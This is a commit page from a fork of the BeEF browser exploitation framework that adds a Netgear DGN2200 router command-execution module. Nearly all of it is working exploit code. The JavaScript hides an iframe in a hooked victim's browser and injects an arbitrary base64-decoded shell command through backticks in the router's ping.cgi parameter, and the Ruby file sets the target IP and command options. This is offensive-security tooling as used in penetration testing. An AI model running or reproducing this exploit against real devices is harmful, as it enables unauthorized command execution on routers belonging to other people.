Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add Netgear DGN2200 Command Execution module

Browse Source
This commit is contained in:
Brendan Coles
2016-03-20 21:30:20 +00:00
parent 264c203a7e
commit d8ce153bb4
3 changed files with 60 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

26
modules/exploits/router/netgear_dgn2200_cmd_exec/command.js Executable file
View File

@@ -0,0 +1,26 @@
//
// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var cmd = '<%= Base64.encode64(@cmd).delete("\n") %>';
var timeout = 15;
var netgear_dgn2200_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
netgear_dgn2200_iframe_<%= @command_id %>.setAttribute('src',"http://" + rhost + "/ping.cgi?IPAddr1=8&IPAddr2=8&IPAddr3=8&IPAddr4=8&ping=Ping&ess_=" + Math.random().toString(36).substring(2,10) + "&ping_IPAddr=`" + beef.encode.base64.decode(cmd) + "`");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(netgear_dgn2200_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", timeout*1000);
});

15
modules/exploits/router/netgear_dgn2200_cmd_exec/config.yaml Executable file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
netgear_dgn2200_cmd_exec:
enable: true
category: ["Exploits", "Router"]
name: "Netgear DGN2200 Command Execution"
description: "This module exploits <a href='http://securitygodmode.blogspot.com/2016/02/netgears-dgn2200-multiple.html'>authentication bypass and command execution vulnerabilities</a> to execute arbitrary commands on Netgear DGN2200 routers."
authors: ["0x3d5157636b525761", "bcoles"]
target:
working: ["ALL"]

19
modules/exploits/router/netgear_dgn2200_cmd_exec/module.rb Executable file
View File

@@ -0,0 +1,19 @@
#
# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Netgear_dgn2200_cmd_exec < BeEF::Core::Command
def self.options
return [
{'name' => 'rhost', 'ui_label' => 'IP address', 'value' => '10.0.0.1'},
{'name' => 'cmd', 'ui_label' => 'Command to execute', 'value' => ''}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end